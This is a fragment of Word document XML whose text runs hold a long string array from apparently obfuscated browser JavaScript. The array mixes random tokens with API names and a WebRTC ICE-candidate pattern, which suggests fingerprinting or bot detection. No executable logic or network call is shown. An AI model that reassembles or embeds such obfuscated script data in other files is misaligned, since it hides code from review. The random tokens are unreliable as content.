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DC97E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>, "554", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ktg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "empty", "8d9TliOP62HwtCBTD4iSfS-Q29r8EdJ3x1kGMPSBT5JoD4T85_HNywvQLPEK", "kAvaOK1sXPk6", "Z4EEzXCVzQ", "4jj-K5c7dcMFGd6e", "Kphz","6xiUDfhKSw", "4x7mf58AatwrQ8_G1WMBig", "bphlzxG3_W2z_xoTBuSrPG_v", "oUfPBKsXB6JqYfaUxXBH5ul8", "pDWJHKp6IaE", "UkuVIPh_BYVVNIKZ8x9s1qhTBkE", "B7Yo7Rnd9A7qnUIzBZi-HVqb3OrD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HLw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "OVG0Lstxebp4R8rRqC1k9K4LfWRq_0mNNcjuqDQu4knh4Q4IFFxrMbRKowCj-tLS", "Proxy", "true", "Date", "6hioIA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GKRmxg_vmQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bind", "type", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>indexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "J0jGLJIlC_hQDMHtzx1d150rJA", "oC2SEb1_dbYgLamw41gGoP58SFsZmXfvP5rC2A", "xnSyZOR6KKBSUZ2lkFk2gw", "cNNy9x650BDKkAw", "1Z0krxE", "LE7bbrIdH-ph", "sdBjmya8uQ", "DGbCU7odffA3K_G41Xxe4fVYNB4_wBK-Mdf_-wdisF3ImnZGUytNGIo", "yT7BdJ1yftgQ", "YybrIosOaPsQIK_x7y0B7b87b39gyH6tZ8Gz_lhc5w", "zEf1N9cBMMBtbbTQ1nRQr41CNx01yyo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "l1SBJ-1qbKt4ft3u0Q", "Y07pRNkLHsY6Spw", "YrERg2Shwxfz_WM2HsE", "Int8Array", "wt9XkzSClCw", "eNNRzjWL_1jf21Y_W--8CVrV_IjjEJUe3Ho", "-zzifIY5L54CWdaCpDZjxtMcfhAurxWSGf7T1SJmnBzrv1dhQBV9fvtexzirz6TJaCrD", "6JFR7S6f5G26vHgUGPSVOw","_xf-ZakBINkEJoGqw1sS", "GH-Oe8N9R5ViHA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CoJiqQjwzAo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "value", "ZVzfVL0cce5gKO31iBNf6bU_XRxVw2uqPYeQ00sPsDGAjjctY2UNHoxmqmWfx4D4CWOkSEaGC9vmPIKLPIRg", "Va8i20HK8TaJ2BgtIuqxNmLC0a3vV5FJ7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zWOBGIo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hIJQjzqBz2ytv3k", "clf_Z5E6UYZBHYA", "0rYCgX3LvSag431lFcnEayep0Ys", "XSPlU_8KUaVVDu6S", "x6Y-9G0", "g4VFzS7PmDCn4A", "AVy4PeBqZKY", "0I1PjSaKkk229ShlWJjnaCKxxPv7U_lU9xJgDK-gHdM", "BB74cYwWE-QjOsWJ0SA", "o7Ee", "top", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HRnkcPcsOA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1GbiAJtBWqkfQA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>querySelector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "O5piuAO1oWeQ_AwoMOj9JlGShOKuPMI", "TG-yWN0oK6NgYKr21HZAyZgWLR8GoUCKUQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastIndexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "svVtmT-2g2Hb2AlVP7niXBnWtoDSQep0pjctIebtJcoAVvCv5P_O1g", "stQj_ETJ0zE", "S0XubcI_KbduMNid", "apply", "XZRrsmqZ2kyknFEYeZi1VhGd3MvOPdIHxns", "moJV32Hi1h_J", "JfJe3w7StGWN", "bF_xWIwgLchcc-_h6hcnww", "21", "yh6SOPhZU60g", "QE2vJdtjbrdTBPzMqnI7hcAUNTp66EzVOQ", "nZs-uA3Tz0G12yhsXv_SaEE", "hqxh2wKdlVieyww", "vACTKq8", "^[\\x20-\\x7E]$", "C6lK6zutvGe7sDEjBOObO3y7zw", "OzPkPYcre9wUB4M", "3R3Fd60_Le0", "t9V3-Qo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FjamNPlIHbID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ui-LBOVPP7oye-I", "bV2nVA", "olaVff54XeY", "KVmUOPB6IplpZbjZiw9K0710fBdI5Q", "BrMF_Ui-skftmTNxeuyAMSCB3feYIax4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2A7WWdEP", "Py_2Lp01", "7MpumjmO71bMw0N6eLCxCjndruPxF4IFoysRINW0QNI5Yuj_vIf5pgu6brorAmxOtbYAlMUo9zYI", "qS-MJbBTa7pTNQ", "uE0", "GRznZvUpDeIvC7bo", "U8Me7ieU1lqn_HU", "nkbHEa0xHt9Bc7OLsjcS8Q", "Symbol", "Xxu_bM1hQ6YvGcyQkQs_2JsIGDpJ", "error", "zf5C_Te2lXvvxA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "bRXfAek5TuIuIJLp5hpP8g", "sewV-3Hnx2P2qnpzForBfwyvnayLf-wt0lU", "24VrzXOK", "x_46pT7l6GDyvzgAIA", "message", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"Vt5e3AOA7HrM6A", "gZA2jS7pzwo", "Mme7JfR6ONoDDt_isz4thYw", "input", "1z2XBqNiMg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PwvWGKc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8XKJIrsvYpNFbA", "-TqlNMp5", "L_VwsEGEtVb82B1iXc_kCwnfmLOHb5BBiTVJG97zGf8peoLw7pf5qSLsH9Y5FmgZ0PRUxeA5txtGlH0", "de0jv0Xz7jfTlAgFNNU", "3lS-BONRELEVKqs", "6vdKrCWtiBCCj35fWZXFWA", "b7wwozC59RGrs2BaHdWwZSXM", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getEntriesByType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2rY", "lBDZK-paKKF7J6jXjF4a_rYhHUxI1C3_NYWs1A4_pWTPnHNIOA", "D5Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hOMAhxnR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vudW9iKdnnHP5EhUVKk", "rvJR4iKdknDm-lhe", "HGqrYtxvCP4eZg", "4VeHQuBOObdOa_2snn9etvZwNz90hiSgadXip31y_ALfnXtLHxkPWJ5X91yPv9m-SQn2DlHtS7X0JdqUaNpxZ4IpQB-nvr13ndY", "Fx6vQONA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avlkzCCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "PbgS80ewlGrbkwRXVOqvFw6n8MA", "OHO5JA", "UbEj5gXXkVffnBZSXeirBlnAzvynO9gKt21tZv__f5xcfcLqhZPhrkGlTf13Om1F2qwZhdV76BFB2AIo727X", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GhmxLog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "\u202EEWibjQBAF\u202D", "x1_gJ582", "Fvg__0_2hFijkh5UPIS9WxSIh6nuOo1S5ykpfLTbHd15Pdj4sKOx_jmSUcN9QSUK_bBN", "aCWVaOIgNsZHFpL-wCgGr6Yy", "ShP4Yb0pQg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pgGNeNZpSLovJbqp_EJb-dkH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "-eRflHi64DL9sC8SLg", "KXu7QcsKPOdrb4WuymVt2A", "8f1t9Qu-2UXT1kghfea9C0HL_LyuJYUO2XRFNKnnAN9qaoas04Grr3_DDdNwCH8SrKt0rqB59TEQiT9x5WnfxinvpdIeWRaBOSUwLI9G", "dV3nZMgAV95JDZ6MmyVx3Ikd", "Image", "xiurMd54FpcP", "getOwnPropertyNames","4-Uf0mjK0zvhl3xSR5iEeiD0yJXXSqhwsxIDDvrBOuRDTPTiqdPFnRetJfYLWAlkgt0yh8kUkkA8uQZLsVGoqQKb67Q", "LN2", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gmrwMuMadoAPQME</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "tkPwPo4mKI9qddij8FZr", "rudG9TKdhEX770ZERZCZeheywJc", "Rpsi0UzerDaSzg4-", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mvsvnUXJnCjCxBdfbA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "crypto", "FATicPAwCfYbBb_Q8TZeoYo", "Option", "pow", "qvUenn7bgiPVpy0lFIf_cw", "WroEtnzz0z-jkA", "LNoRz3filR39yg", "iDLEVa0OBPJsVZiB", "object", "khDTIp8UQ_pON6I", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cPUBlHLU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "y1eWB45mQ8E", "EIs9_R_CyBylgUcv", "cpYe1nnA1nM", "JJ9Qiz-1mGyt", "eJlBrRq95267hEt2Qg", "69NU1i6F7mKEuXIqQf_GZA", "Sl6wMt9b", "p1LgNIwmAt8bGZeJ6gNsjMRqBDhT5zDNWvqNlyRQj3er_wgkdA", "3YRFgDed-WSMsD4", "Q9VtuhG5syLu2EVTbdnuGw", "MzPwRIosHc94evzbrQIjqtI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jzOYWQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "self", "F3GvHfFFSf5pFKvi30MYuqBiM10", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RWegOsdw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "n8NlyxqivU7EzWZZaa6gUg", "7SmYbdQgMdVqA6Lu7D8jsLwKVw", "QKhP5DiglHKlpDY", "Function", "kp4", "7-UbqGLM", "UNDEFINED", "WlaXHf9RVqB7LenI3RV--7sqVAlA2nGZJI6b2mxGtg", "MdBAymj_vEL-yxoSRIjVIG6i_aXDW6di9DFxbK7ZNQ", "W5pnvSy5", "tGy-MZJcBZ13TJDE10Rpy9ZRGzMV6x7W", "pgCkUPNEV5kWG5WA-G950fkuJSoz0kXedNKa73YN01ay8Wt4PWN4eoU4", "Gb818UDl7lvlgwJrNpv5AhaAwOnE", "A0SzF85HEZpIGdHx5QM", "max", "M0XFbaQsEvdtIf3FziJR5pswVwtD9niwFovoxz9T83fD9kVeDHN2FOEBgly78o6bBginPSraWIn7LYeMJaglHawbdkPCn9gmy6TL6y-irXVJt09H-nUY7w", "sptnpBGuyVa0mgtN", "39YE2nDyjA", "Safari", "l_wCrXXw_inyul0XY4Q", "5o80kl3H9g", "awzFRdkbEI41XvDF4lQYrfg", "9eMd2UKhpg", "xrYynyaX11s", "method", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"1G_YCrsCBdlTY_26xnpCqvdm", "s0LrZoQ-MpR2UdXw-1lqh5tZDSsN_RPZGaiXmQcihWP17ActfglBcqR4nk6riLuA", "U_c44GjWtyvJ5HQLNvjWL2Ditw", "mmjjJ88D", "A-YwvgTO1VfUlR8ABqb3Tx2J5ca5I4hSz2E8RaazEJEpbYa2hc6roS6LQA", "7gDWErA", "yUzBcMZgUZBaQN2q5A", "4Tm4CsRXdJo", "9vZGkkSXjVLK7A", "bg2YX-IQYtR5WcCcjg", "E6x89AWoySk", "wVfvOJ8oPL1jT8HG7lx7jg", "jBX7LZ8", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eyWpS_U</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-JA", "LRL1WoYUTLN-KKCntw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byteLength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gRezIthr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Xbwz3UDU50eZ1B0hNvCuA2XE5_6rEo1O9XIXOY-qEMcmFbCqsMOHpBX0YrhDQnxk4_ZTjdc_u21L33I8xkjQ7lXtj7Y2", "5UaZQPRQbJY", "OzenP8F0E48JCpDrty5q1I0DPV4i_E_DCaaO_1srlQ", "ywKZetd3V7g7AK6g-Q", "P0vSPq84BfY", "J6Uo6EM", "seUw8TTKsi7xxgtM", "9waqGL0dYsJJO4OK", "EalE9xm4xG6dyGVZNMihCWmSyYI", "rfoqnFTA1QLClkwGboTvXQvatPHgVMNIqWgGQNmhaNAEDfX18s6HsFiqcaA", "Element", "V5lDty3u6XKgq1k0BbSOGQ", "llvbYfReRMNkHZmVt2wVj9k7Hg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FgDFVw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Mt1OnnK0ymf7", "LLwD92GZjWfKnDY", "jI4t8Hfj0Ec", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YwvYWbsGOw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "uwmFQPVZT7IdOOOExHdKuPRqI0o7niz9Konh_CxIo0SHmkhEH20JCcsQ_X3cmpCqQ0msTlrRR_3oDOnSVowqC-BtSw", "ybkHozPPzD6LhEM", "Al4", "Of5HoCvoslPM", "SWe8XtsdPPx3eqSly2N6x4BUIwgRpEKJ", "Ovty_n_AuA2i9lcYKfM", "SE7nRo40FOFJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>characterSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "wZ4", "R2LQ", "K4Irvg", "String", "PNsPj0rA1Q", "-dJ29jyR1g7txltRZw", "bzKedaxRRfsgbOvNvlkBoM1tTxIDtybrTZ6tlC8TuSuJuBIIE3trCrwYyQbq78TNXRrrKXqdV8PmYNve", "vuhT-RahmHL__Sl3D4jC", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BRqrPttj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ydBfsSq1g2r4s2hXVZrIahOki9aCKuo5hhs4G6fKf_9XSNbXnuvPkGmYENMuYRw3lZ01tfZL0QZz8RUfrXS7hHCC48tWBlY", "_st4i1rXjnv64Q", "123", "TJBJ3jejmUG5ujR6Xg", "DGKN", "o2mtJtx6bLI", "95FLtjSm_HO9iVFtSJf_", "lDKdf99wE4E", "window", "R1KtaMppXYI", "mivRNPpQLr92BrjdoVkW740", "iPEQmgne4Q_jtEAjAcWwTg", "JSON", "bzSwes9ib8YqA4n0sBIjn5wfXXtE5lKFT7CK2h4-zT3r9UJ_a1Y_I_Am3w", "Y_5X3DWU-WbooCQqD8mZMGXyoYeLC7Udv0B0A7-9Na9GC7Ge_J-AqVnqJetXGls316ogl4YL0Bk6rBYFjQ", "cP144w-q6EDflhIM", "bUDTDp8Ocst4ZK3ZmR4F", "vV66FrRISrY", "BDCsRalkOf0", "tF77bo4sXA", "-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nPHeaA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HJo68QfVhQSNyEdOfrrsU1qkyfvGNMk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EoY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "put", "_qpX7BGu42yZyzQ", "JAKzT_ZSaZABVIWHtXMutP5USjpB", "jweAR_prZp0wFMKJoQ", "EQGAF80", "u6Bh-VzS5w", "0qI6u2-7", "l70P41SyqF7drQx1Xg", "svhHmzeIhDz343QVf_zJRmPs", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wQLdEoo_Wdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CustomEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ty-WH-0", "bdR_vA2O72zFrWAIVMA", "O5td03mfngeezlNtTOGlFHHCt50", "a6Nz-xA", "sort", "Uint32Array", "8a4XrHLu2jyprXsGXvaCMHywm9uUPb1zkk8mCsnDJ6lwI8STxcDgj2-HQYxwBVxB0Y1bz-8K3WEVy2Ft00WlgHrW", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CmSVMVITOdSY_g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "Zo9J3XWQjgmt8XNiZ9c", "J3-tRMhNFtpZR5o", "kr9zyyS6x2K9-g", "VBOzZMFmE4A-T5vJrxsz05wFQXpL_VyFRqKUh21n0w", "oQOeBf5QMKAocg", "ibcb40f40yag1SkoD_uCCg", "some", "zsNi7zTttE-fiRJUfYfnTHrE7L2tK54", "6_hjwg6Nq3bQhkZ_aKA", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"H6g13VzO8QySwg88", "4rUYhg", "3D3oYtwSHQ", "ufkUuGztqwPJ9Cl3Wqs", "oa4og1Xa", "-3T4UIgSMtsKYILwpgRv1ZY", "W90", "x1XkeLoiWv1QENqK", "fuIPj23Agg-7qiBf", "sQnlRLAOGsE5BIKKrQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Cm6UB51hdYI", "body", "UGI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXTI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "kcEWx37doRfW9z9oWA", "0Yx3zxOB", "5OIanWPXsxbE01dMYczzFkmF", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zuE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "call", "OBLVRKE", "C45wvQGHi1KCyCsABd7UEmM", "hLRk5BCxkgyQ", "J2rbQKdRFcsFH5L71Qpy6Ot2URMViS2z", "-WquLso5XIprfOvo", "ucxDrx2hjk3ipWJiQo3SWRilsM2nK_4qhw", "d95whQOTqknZh0F4ew", "px0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>teFm_UbwlXzSng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Reflect", "floor", "QrpV6jzRpiaW92pRcA", "pYsuvHvtkweZ1ltnKbLyVAKI", "6\uFE0F\u20E3", "NGXffrUiR9pGJA", "a9704418b7c42678", "oijSF7UbbOISJu6P1W1HtNR0KUEshD32PJX_9zpYskikykESSC1LS5ge_W3Bq4LgEw", "Lfw04kThix_D2wANPOKyH17U0d2IN9wahG4", "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uFFFD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>{}", "clear", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>innerText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go18shuvknmF_A", "jZBdxSSIzm6R9CYxRLCbdgP2o5DSUvs", "YJlDyDePiWik8xUeBtuJIHE", "d6Za_jK_-02Kq3A_Eg", "7huIVudaQe8kKrvbjCgbg6IhZVVq", "jYJw4mA", "TcMGiEX_0wzRzC0", "6ZYvlFHX5AixiWc-bN2qLUyLuMCw", "yOx7jROTsWzRkEAMYNg", "k7ZfwyCK_nXJ-g", "b9Agj0ninzi0sT0Wa8WhRSPZ", "_HW1Isp0JoB9", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hUrFUrY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "rcNznAixsRmcgREgW6z1", "-7cGxmHayWbA5nwgWcmBOmTq5c-QWfhqihAHUPnlb6QJQq6M_Z_QjlvwN70eNB0y", "Ij69UMtdbZM", "E80CymnN-jbMuQ", "ChLqYowsfbQQRYHK8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "DAq_KtBhCp9B", "OkzZWLBJVN8lJ6Sr4wxI_vJsQg4", "d8wx-lv-7inSvlI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host|srflx|prflx|relay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "LB2XYORpTA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lF_ccdZFWA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "cgs", "complete", "zEmUCOVVUqRSKb6hl2MT", "mcA1vkDj7xaYwFA9Pf_vVRiOr_usMNwZ1w","rif6eQ", "width", "vT7OBqMcIPsAYoXAwU1aoQ", "data", "9BfnFIpTXsUoB-OXsQ", "U8hWjiKAgQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ssADyyXfiiv_73Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BgzjaYYyDdIBSQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ZxfBULQVVP0pYbyixSUI56FnJRdPyWGy", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uhiUJg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "yxOcO78uCu8uDIjR", "JAD7Xpp5TNBQUdy5pVFB0cU_MS8-lUHbCw", "BYdN226SiQeV8nltac4", "RzT_PZA3L8lcW4o", "vXLVPLJgYJckRtu3tm5R7-Z5HQ", "5AaiC853Xw", "qW-_eth2AY9oWdGYvEdkjcdSESwNqhvSBLnNnSQ5iD7prE14JyM0abxxilfrhauZcHLbVXvlM4bKFNftf6VMXYFWcBjSyZoEs_qj-CyLlk46jz4OvjUfixEe1bBWLyM11AFKkTxyGFChmb9NA5HTQnOkguW46szh51YpbGh4G3yNk5hlWyuGpTTT62ofOKqPM3GsJS4gQWOPxEgcCjOglae43cTPI50STLl_lszMHlbZlYjdDyRJ0zY", "4W6sZb0", "Ud8LkALOwlPlpDkXPZzNfiqp2P2D", "yLcKg1bFsAE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "MH-mP81CVJk", "2rIU0WTI3iOZvyF-S5jKfiWi4djhW_x4-xJxI_uVaNULQame-I3Hi0yBfrsaYgFm285litcK32Ig-QhBj06ms177lfgyY2WvD0R8VMNncqTXUJL-Vd_xOs6zMFC2hdyeaL-VPdOe_LpMRhOi73U5r6wJZwVYQDNKW-j2wIqJ-5B6cX2LhIdoR8QkDZvAlUN_wNtTjpKens9tNajw_dFFe3gUMyY_1HvjrFWSYT0g8bk_ZFdw5tS6eZwnwwcSoyur4LTN_Us7DAuSXKH_fb8oNm2cNrZHChdDbcnOqCR-H7zPK0v41BFq4f3fTNc-gBFEcmUDUH0Nw3w8RJ8wVVnD5aicumkgkIcT8_0KUiMMqnpYA5XVV_xpiuTkYLcfOhNGfa</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>xda_f5Oe2XsvzyraMqYfd4YWM8ZIJPWX8bT5Qj-o86eFuKyT1po1K_wQydaWwJAlZ15DzxTs_up35x5BSVIBLNSwVtA0X-soOvyMxyGd0lUr1saX_zDTPe5M69GkMDHYrd8p3kK5B80c24B2KxwWRGESTiex6redfeKWGn4YslXgsWuw6WpEJIDgSrV7nu2qi3LOnSouDBv5y0GKoQM1rEMTyOyg6CFMkFUBbRxvHOVC0DkMhEyGP2KTa6IzhkWlfiG1j7MD0SnwuHpMcrRBOmhDOPnKDpdcZPXPgER_oDtZVgL7iyJeVArmBjNdoG0GRyqrd0af1I0Z9o9fFO2g-c-Cqc_YPqCcXJBnwlCsYuD_J0zIq7B5Df90gUYx1xHu2C4sP8P0VDpTAMrU1tIHIX_eEgtB-vHWOS7C9TqlzfAi_-3538dszBf_eLsuPL", "JJN32A-Ht12-hwQ1C-qTI0G3pPGKdeR2gw5dQKyidq87dbiSkLA", "8D-SIrkt", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UIEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hV_pN50", "-k_kGb4aQN5eQNfq_zo", "elHAOfhQRcAsOJif3g", "LhesdeF6WpocDMCyjzd-x40Q", "NALlSco4cw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SubmitEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "FALSE", "L-w6", "__proto__", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hvFLuD70zmyDz28QBg", "80", "KgiAaO59R9AycrmDmVgFoMdxUw", "D6cA8jg", "s8xXkxWj", "TV-EJ-oPM7BcAOLj6itW", "Vst8vQSgz0_wqkEXbN73Cg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>removeEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
